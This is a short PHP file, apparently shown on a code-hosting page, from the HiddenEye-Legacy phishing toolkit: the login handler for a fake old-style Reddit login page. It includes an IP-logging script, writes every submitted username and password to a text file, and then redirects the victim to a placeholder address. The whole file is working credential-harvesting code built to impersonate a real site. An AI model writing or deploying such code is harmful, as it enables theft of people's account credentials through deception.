HiddenEye-Legacy/WebPages/Reddit-old/login.php

7 lines
186 B
PHP
Raw Normal View History

2019-07-12 13:58:31 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();